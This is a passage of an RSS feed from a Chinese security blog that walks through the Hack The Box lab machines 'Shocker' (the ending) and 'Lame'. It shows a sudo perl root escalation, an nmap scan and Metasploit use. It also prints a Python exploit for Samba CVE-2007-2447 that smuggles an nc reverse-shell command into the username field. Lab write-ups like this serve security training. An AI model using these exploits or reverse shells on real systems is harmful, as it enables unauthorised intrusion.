&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">find / -name &lt;span class="s1">&amp;#39;user.txt&amp;#39;&lt;/span> 2&amp;gt;/dev/null
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1">#过滤错误信&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">2&amp;gt;/dev/null
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/shocker/image/image_InH-4-ve1r_hu7111564608d0d0a99f368d4829d6edfd_38190_e70296bb7bf257aee3276fc6c4ee9525.webp 400w,
/post/hackbox/shocker/image/image_InH-4-ve1r_hu7111564608d0d0a99f368d4829d6edfd_38190_b2439e22f5897051bf22be6ff912e065.webp 760w,
/post/hackbox/shocker/image/image_InH-4-ve1r_hu7111564608d0d0a99f368d4829d6edfd_38190_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/shocker/image/image_InH-4-ve1r_hu7111564608d0d0a99f368d4829d6edfd_38190_e70296bb7bf257aee3276fc6c4ee9525.webp"
width="747"
height="152"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;h3 id="提权">提权：&lt;/h3>
&lt;p>使用 sudo -l 查看得知有权限使用 sudo 运行 /usr/bin/perl&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">sudo -l
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/shocker/image/image_ML_-8g0r0I_hu4c33c1d595644aa07a3dce68b7e2fa79_43103_966855de71dd58574f920b687304ae07.webp 400w,
/post/hackbox/shocker/image/image_ML_-8g0r0I_hu4c33c1d595644aa07a3dce68b7e2fa79_43103_360f6a2e0dab6c7983e041c3ec47941e.webp 760w,
/post/hackbox/shocker/image/image_ML_-8g0r0I_hu4c33c1d595644aa07a3dce68b7e2fa79_43103_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/shocker/image/image_ML_-8g0r0I_hu4c33c1d595644aa07a3dce68b7e2fa79_43103_966855de71dd58574f920b687304ae07.webp"
width="960"
height="184"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>执行&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">sudo /usr/bin/perl -e &lt;span class="s1">&amp;#39;exec &amp;#34;/bin/bash&amp;#34;;&amp;#39;&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>拿到root权限，&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/shocker/image/image_ghx3cNunJk_hu816836741ff3c35b57b2550d1dff0f6b_26611_55babcdd652d8084990c0e5fd0732cb3.webp 400w,
/post/hackbox/shocker/image/image_ghx3cNunJk_hu816836741ff3c35b57b2550d1dff0f6b_26611_4fa5822f0518362ff4f928ecbee365fb.webp 760w,
/post/hackbox/shocker/image/image_ghx3cNunJk_hu816836741ff3c35b57b2550d1dff0f6b_26611_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/shocker/image/image_ghx3cNunJk_hu816836741ff3c35b57b2550d1dff0f6b_26611_55babcdd652d8084990c0e5fd0732cb3.webp"
width="846"
height="102"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">find / -name &lt;span class="s1">&amp;#39;root.txt&amp;#39;&lt;/span> 2&amp;gt;/dev/null
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div></description></item><item><title>Lame</title><link>https://docs.kaiasec.tk/post/hackbox/lame/</link><pubDate>Wed, 09 Mar 2022 11:56:40 +0800</pubDate><guid>https://docs.kaiasec.tk/post/hackbox/lame/</guid><description>&lt;p>nmap&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">nmap -T4 -Pn -A 10.10.10.3 -p 1-65535
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>扫描结果&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">Nmap scan report &lt;span class="k">for&lt;/span> 10.10.10.3
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">Host is up &lt;span class="o">(&lt;/span>0.26s latency&lt;span class="o">)&lt;/span>.
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">Not shown: &lt;span class="m">65530&lt;/span> filtered tcp ports &lt;span class="o">(&lt;/span>no-response&lt;span class="o">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">PORT STATE SERVICE VERSION
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">21/tcp open ftp vsftpd 2.3.4
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span>_ftp-anon: Anonymous FTP login allowed &lt;span class="o">(&lt;/span>FTP code 230&lt;span class="o">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span> ftp-syst:
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span> STAT:
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span> FTP server status:
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span> Connected to 10.10.14.3
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span> Logged in as ftp
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span> TYPE: ASCII
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span> No session bandwidth limit
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span> Session timeout in seconds is &lt;span class="m">300&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span> Control connection is plain text
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span> Data connections will be plain text
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span> vsFTPd 2.3.4 - secure, fast, stable
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span>_End of status
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 &lt;span class="o">(&lt;/span>protocol 2.0&lt;span class="o">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span> ssh-hostkey:
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span> &lt;span class="m">1024&lt;/span> 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd &lt;span class="o">(&lt;/span>DSA&lt;span class="o">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span>_ &lt;span class="m">2048&lt;/span> 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 &lt;span class="o">(&lt;/span>RSA&lt;span class="o">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">139/tcp open netbios-ssn Samba smbd 3.X - 4.X &lt;span class="o">(&lt;/span>workgroup: WORKGROUP&lt;span class="o">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">445/tcp open netbios-ssn Samba smbd 3.0.20-Debian &lt;span class="o">(&lt;/span>workgroup: WORKGROUP&lt;span class="o">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">3632/tcp open distccd distccd v1 &lt;span class="o">((&lt;/span>GNU&lt;span class="o">)&lt;/span> 4.2.4 &lt;span class="o">(&lt;/span>Ubuntu 4.2.4-1ubuntu4&lt;span class="o">))&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">Service Info: OSs: Unix, Linux&lt;span class="p">;&lt;/span> CPE: cpe:/o:linux:linux_kernel
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">Host script results:
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span> smb-security-mode:
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span> account_used: guest
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span> authentication_level: user
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span> challenge_response: supported
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span>_ message_signing: disabled &lt;span class="o">(&lt;/span>dangerous, but default&lt;span class="o">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span>_smb2-time: Protocol negotiation failed &lt;span class="o">(&lt;/span>SMB2&lt;span class="o">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span> smb-os-discovery:
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span> OS: Unix &lt;span class="o">(&lt;/span>Samba 3.0.20-Debian&lt;span class="o">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span> Computer name: lame
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span> NetBIOS computer name:
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span> Domain name: hackthebox.gr
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span> FQDN: lame.hackthebox.gr
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span>_ System time: 2022-04-02T04:51:23-04:00
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">|&lt;/span>_clock-skew: mean: 2h07m46s, deviation: 2h49m45s, median: 7m43s
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">Nmap &lt;span class="k">done&lt;/span>: &lt;span class="m">1&lt;/span> IP address &lt;span class="o">(&lt;/span>&lt;span class="m">1&lt;/span> host up&lt;span class="o">)&lt;/span> scanned in 1047.56 seconds
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>首先是21端口 vsftpd 2.3.4版本搜索发现存在笑脸漏洞&lt;/p>
&lt;p>原理是&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">此漏洞是开发者在软件中留下的后门漏洞，当连接带有vsftpd 2.3.4版本的服务器的21端口时，输入用户中带有&lt;span class="s2">&amp;#34;:) &amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="o">(&lt;/span>这大概就是此漏洞名字的来源）,密码任意，即可运行 vsf_sysutil_extra&lt;span class="o">()&lt;/span> ：打开服务器的6200端口，并且不需要密码
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">就能从6200端口以管理员身份登入目标服务器，漏洞危害很大。
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>但是通过复现后没办法利用&lt;/p>
&lt;p>22端口&lt;/p>
&lt;p>139、445端口&lt;/p>
&lt;p>发现smbd 3.0.20-Debian服务，搜索了下发现存在cve&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/lame/image/image_CysqiS7zSr_hu5b53a1f71f91c16ed6c62fdd97874ceb_115731_f3eb5f1122b95894e820123722efc497.webp 400w,
/post/hackbox/lame/image/image_CysqiS7zSr_hu5b53a1f71f91c16ed6c62fdd97874ceb_115731_0a0d1e93617ee8aa47d42491b9f6c7d1.webp 760w,
/post/hackbox/lame/image/image_CysqiS7zSr_hu5b53a1f71f91c16ed6c62fdd97874ceb_115731_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/lame/image/image_CysqiS7zSr_hu5b53a1f71f91c16ed6c62fdd97874ceb_115731_f3eb5f1122b95894e820123722efc497.webp"
width="1884"
height="771"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>msf查找漏洞模块&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/lame/image/image_kLZxatW2tQ_hua837105fe2005f8b22280080df5b8c2e_18588_487421146496822732b846b9d514e23d.webp 400w,
/post/hackbox/lame/image/image_kLZxatW2tQ_hua837105fe2005f8b22280080df5b8c2e_18588_ecef11e3abd1a03593b53c2179048bf3.webp 760w,
/post/hackbox/lame/image/image_kLZxatW2tQ_hua837105fe2005f8b22280080df5b8c2e_18588_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/lame/image/image_kLZxatW2tQ_hua837105fe2005f8b22280080df5b8c2e_18588_487421146496822732b846b9d514e23d.webp"
width="1011"
height="244"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>配置&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/lame/image/image_HWhNfYhwAG_hu746e1094f3dec3d8dbd97817736a4b42_32936_c2281886d94db10d3020c46864971a47.webp 400w,
/post/hackbox/lame/image/image_HWhNfYhwAG_hu746e1094f3dec3d8dbd97817736a4b42_32936_df52ec901accb1c0599b0af671f797b8.webp 760w,
/post/hackbox/lame/image/image_HWhNfYhwAG_hu746e1094f3dec3d8dbd97817736a4b42_32936_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/lame/image/image_HWhNfYhwAG_hu746e1094f3dec3d8dbd97817736a4b42_32936_c2281886d94db10d3020c46864971a47.webp"
width="1054"
height="366"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>成功！&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/lame/image/image_GAALbTQ2pt_hu686a4ab56d56b6c325348503733c0de9_10449_2916e7d979c0569dbd85399ba64a9aac.webp 400w,
/post/hackbox/lame/image/image_GAALbTQ2pt_hu686a4ab56d56b6c325348503733c0de9_10449_ac864269812ab2f6e615aaea28c65aea.webp 760w,
/post/hackbox/lame/image/image_GAALbTQ2pt_hu686a4ab56d56b6c325348503733c0de9_10449_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/lame/image/image_GAALbTQ2pt_hu686a4ab56d56b6c325348503733c0de9_10449_2916e7d979c0569dbd85399ba64a9aac.webp"
width="839"
height="121"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>python升级交互式shell&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">python -c &lt;span class="s1">&amp;#39;import pty; pty.spawn(&amp;#34;/bin/bash&amp;#34;)&amp;#39;&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>拿到flag&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/lame/image/image_jdaGGeXlmT_hu04b02139723d261bc80c9969a29949be_10077_59527a336b367a7973fda8364902a336.webp 400w,
/post/hackbox/lame/image/image_jdaGGeXlmT_hu04b02139723d261bc80c9969a29949be_10077_c37919ade2c8e8c53fab172d97fce0b9.webp 760w,
/post/hackbox/lame/image/image_jdaGGeXlmT_hu04b02139723d261bc80c9969a29949be_10077_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/lame/image/image_jdaGGeXlmT_hu04b02139723d261bc80c9969a29949be_10077_59527a336b367a7973fda8364902a336.webp"
width="473"
height="154"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>不使用mfs的话，也找到一个脚本执行&lt;/p>
&lt;p>&lt;a href="https://github.com/ozuma/CVE-2007-2447" title="https://github.com/ozuma/CVE-2007-2447" target="_blank" rel="noopener">https://github.com/ozuma/CVE-2007-2447&lt;/a>&lt;/p>
&lt;p>samba-exploit.py&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-python" data-lang="python">&lt;span class="line">&lt;span class="cl">&lt;span class="ch">#!/usr/bin/python3&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1"># Ref: https://github.com/amriunix/CVE-2007-2447/blob/master/usermap_script.py&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1"># Ref: https://amriunix.com/post/cve-2007-2447-samba-usermap-script/&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1"># Product: Samba&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1"># Vuln: CVE-2007-2447&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1"># Exploit-DB: https://www.exploit-db.com/exploits/16320&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1">#&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1"># install: pip3 install pysmb&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="kn">import&lt;/span> &lt;span class="nn">sys&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="kn">import&lt;/span> &lt;span class="nn">platform&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="kn">from&lt;/span> &lt;span class="nn">smb.SMBConnection&lt;/span> &lt;span class="kn">import&lt;/span> &lt;span class="n">SMBConnection&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="k">def&lt;/span> &lt;span class="nf">exploit&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">rhost&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">rport&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">lhost&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">lport&lt;/span>&lt;span class="p">):&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="n">payload&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="s1">&amp;#39;mkfifo /tmp/f; nc &amp;#39;&lt;/span> &lt;span class="o">+&lt;/span> &lt;span class="n">lhost&lt;/span> &lt;span class="o">+&lt;/span> &lt;span class="s1">&amp;#39; &amp;#39;&lt;/span> &lt;span class="o">+&lt;/span> &lt;span class="n">lport&lt;/span> &lt;span class="o">+&lt;/span> &lt;span class="s1">&amp;#39; 0&amp;lt;/tmp/f | /bin/sh &amp;gt;/tmp/f 2&amp;gt;&amp;amp;1; rm /tmp/f&amp;#39;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="n">username&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="s2">&amp;#34;/=`nohup &amp;#34;&lt;/span> &lt;span class="o">+&lt;/span> &lt;span class="n">payload&lt;/span> &lt;span class="o">+&lt;/span> &lt;span class="s2">&amp;#34;`&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="n">conn&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="n">SMBConnection&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">username&lt;/span>&lt;span class="p">,&lt;/span>&lt;span class="s2">&amp;#34;&amp;#34;&lt;/span>&lt;span class="p">,&lt;/span>&lt;span class="s2">&amp;#34;&amp;#34;&lt;/span>&lt;span class="p">,&lt;/span>&lt;span class="s2">&amp;#34;&amp;#34;&lt;/span>&lt;span class="p">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="n">conn&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">connect&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">rhost&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="nb">int&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">rport&lt;/span>&lt;span class="p">))&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="k">if&lt;/span> &lt;span class="vm">__name__&lt;/span> &lt;span class="o">==&lt;/span> &lt;span class="s1">&amp;#39;__main__&amp;#39;&lt;/span>&lt;span class="p">:&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nb">print&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s2">&amp;#34;[*] CVE-2007-2447 - Samba usermap script&amp;#34;&lt;/span>&lt;span class="p">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="k">if&lt;/span> &lt;span class="nb">len&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">sys&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">argv&lt;/span>&lt;span class="p">)&lt;/span> &lt;span class="o">!=&lt;/span> &lt;span class="mi">5&lt;/span>&lt;span class="p">:&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nb">print&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s2">&amp;#34;[-] usage: python &amp;#34;&lt;/span> &lt;span class="o">+&lt;/span> &lt;span class="n">sys&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">argv&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="mi">0&lt;/span>&lt;span class="p">]&lt;/span> &lt;span class="o">+&lt;/span> &lt;span class="s2">&amp;#34; &amp;lt;RHOST&amp;gt; &amp;lt;RPORT&amp;gt; &amp;lt;LHOST&amp;gt; &amp;lt;LPORT&amp;gt;&amp;#34;&lt;/span>&lt;span class="p">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nb">print&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s2">&amp;#34;[-] at another terminal, $ nc -lvnp &amp;lt;LPORT&amp;gt;&amp;#34;&lt;/span>&lt;span class="p">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="k">else&lt;/span>&lt;span class="p">:&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nb">print&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s2">&amp;#34;[+] Connecting&amp;#34;&lt;/span>&lt;span class="p">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="n">rhost&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="n">sys&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">argv&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="mi">1&lt;/span>&lt;span class="p">]&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="n">rport&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="n">sys&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">argv&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="mi">2&lt;/span>&lt;span class="p">]&lt;/span> &lt;span class="c1"># Usually 139/tcp&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="n">lhost&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="n">sys&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">argv&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="mi">3&lt;/span>&lt;span class="p">]&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="n">lport&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="n">sys&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">argv&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="mi">4&lt;/span>&lt;span class="p">]&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="n">exploit&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">rhost&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">rport&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">lhost&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">lport&lt;/span>&lt;span class="p">)&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">&lt;span class="c1">#安装smb模块&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">pip3 install pysmb
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1">#执行&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">python samba-exploit.py &amp;lt;RHOST&amp;gt; &amp;lt;RPORT&amp;gt; &amp;lt;LHOST&amp;gt; &amp;lt;LPORT&amp;gt;
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/lame/image/image_HdYNQEPdr2_hufe0a8b51f030252c3a475f289194bdde_5719_50c0761d3e41f971ff6f970c5d933d50.webp 400w,
/post/hackbox/lame/image/image_HdYNQEPdr2_hufe0a8b51f030252c3a475f289194bdde_5719_f5e1e5956f2140714ba89a7f93f91af7.webp 760w,
/post/hackbox/lame/image/image_HdYNQEPdr2_hufe0a8b51f030252c3a475f289194bdde_5719_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/lame/image/image_HdYNQEPdr2_hufe0a8b51f030252c3a475f289194bdde_5719_50c0761d3e41f971ff6f970c5d933d50.webp"
width="518"
height="64"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/lame/image/image_5phulVRd_j_hu94d9715faba23c4ccad52a6f9f852838_23134_54cd1b9f6c1f0b29e65f295f89d0580d.webp 400w,
/post/hackbox/lame/image/image_5phulVRd_j_hu94d9715faba23c4ccad52a6f9f852838_23134_bafb1aee53eeeff6e44179be19fb526f.webp 760w,
/post/hackbox/lame/image/image_5phulVRd_j_hu94d9715faba23c4ccad52a6f9f852838_23134_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/lame/image/image_5phulVRd_j_hu94d9715faba23c4ccad52a6f9f852838_23134_54cd1b9f6c1f0b29e65f295f89d0580d.webp"
width="568"
height="473"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p></description></item></channel></rss>